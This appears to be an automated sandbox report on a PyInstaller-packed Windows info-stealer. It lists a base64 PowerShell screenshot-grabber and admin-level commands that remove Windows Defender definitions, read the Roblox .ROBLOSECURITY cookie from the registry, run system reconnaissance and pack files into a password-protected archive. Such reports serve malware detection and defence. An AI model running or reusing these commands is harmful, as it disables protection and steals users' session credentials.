gACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	02:37:34
Start date:	13/12/2024
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase:	0x7ff7dfee0000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	02:37:35
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 1224, Parent PID: 7432

General

Target ID:	68
Start time:	02:37:35
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	02:37:35
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	02:37:35
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	02:37:36
Start date:	13/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff733b70000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	02:37:36
Start date:	13/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib -r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff6f18f0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	02:37:36
Start date:	13/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline"
Imagebase:	0x7ff664450000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	02:37:36
Start date:	13/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES226F.tmp" "c:\Users\user\AppData\Local\Temp\uses4c50\CSCF61F15A833E5414089F1F2D7C06D86CA.TMP"
Imagebase:	0x7ff7e4b90000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	02:37:39
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	02:37:39
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 7988, Parent PID: 7432

General

Target ID:	79
Start time:	02:37:39
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	02:37:39
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	02:37:39
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	02:37:39
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	02:37:39
Start date:	13/12/2024
Path:	C:\Windows\System32\getmac.exe
Wow64 process (32bit):	false
Commandline:	getmac
Imagebase:	0x7ff6f5dd0000
File size:	90'112 bytes
MD5 hash:	7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	02:37:39
Start date:	13/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff733b70000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	02:37:39
Start date:	13/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff6f18f0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	02:37:39
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7656, Parent PID: 5964

General

Target ID:	87
Start time:	02:37:39
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	02:37:40
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: tasklist.exePID: 5980, Parent PID: 5964

General

Target ID:	89
Start time:	02:37:40
Start date:	13/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff644170000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	02:37:40
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	02:37:40
Start date:	13/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff733b70000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	92
Start time:	02:37:40
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7920, Parent PID: 1708

General

Target ID:	93
Start time:	02:37:40
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	94
Start time:	02:37:40
Start date:	13/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff733b70000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	95
Start time:	02:37:41
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7848, Parent PID: 7856

General

Target ID:	96
Start time:	02:37:41
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	02:37:41
Start date:	13/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff733b70000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	98
Start time:	02:37:43
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	99
Start time:	02:37:43
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	100
Start time:	02:37:43
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	101
Start time:	02:37:44
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	102
Start time:	02:37:44
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	103
Start time:	02:37:44
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	108
Start time:	02:37:53
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	109
Start time:	02:37:53
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	110
Start time:	02:37:54
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *
Imagebase:	0x7ff60e5c0000
File size:	630'736 bytes
MD5 hash:	9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	112
Start time:	02:37:57
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase:	0x7ff63a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	113
Start time:	02:37:57
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	128
Start time:	02:37:57
Start date:	13/12/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	133
Start time:	02:37:58
Start date:	13/12/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	71

Executed Functions

Function 00007FF7C71B8BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257
synchronizationwindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7C71B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7C71B45E4,00000000,00007FF7C71B1985), ref: 00007FF7C71B9439

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8C2B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8C46

Part of subcall function 00007FF7C71CA4EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71CA500

Part of subcall function 00007FF7C71C878C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C87F3

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8CD6
CreateProcessW.KERNELBASE ref: 00007FF7C71B8D0E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8D18

Part of subcall function 00007FF7C71B2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2C9E
Part of subcall function 00007FF7C71B2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2D63
Part of subcall function 00007FF7C71B2C50: MessageBoxW.USER32 ref: 00007FF7C71B2D99

RegisterClassW.USER32 ref: 00007FF7C71B8D70
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8D7B
CreateWindowExW.USER32 ref: 00007FF7C71B8DC5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8DD7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8DF2
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8E05
PeekMessageW.USER32 ref: 00007FF7C71B8E29
TranslateMessage.USER32 ref: 00007FF7C71B8E37
DispatchMessageW.USER32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8E41
PeekMessageW.USER32 ref: 00007FF7C71B8E5C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8E6E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8E89
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8E9F
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8EA9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8EB7
DestroyWindow.USER32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8FF4
GetExitCodeProcess.KERNELBASE ref: 00007FF7C71B9009
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B9012
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B901F

Strings

PyInstaller Onefile Hidden Window, xrefs: 00007FF7C71B8D85
CreateProcessW, xrefs: 00007FF7C71B8D27
Failed to create child process!, xrefs: 00007FF7C71B8D20
PyInstallerOnefileHiddenWindow, xrefs: 00007FF7C71B8D44

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction ID: 8708c9eeda6aeecd6e7cc5af4ea216f2604f4827efad2045f871fd21554d827b
Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction Fuzzy Hash: 69D19432A08A4287EB21AF75F8942A9B761FBD4F68F804235DE5E43A94DF3CD146C750

Function 00007FF7C71B1000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF7C71B3A17, 00007FF7C71B3A2F, 00007FF7C71B3A9B
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF7C71B3D12
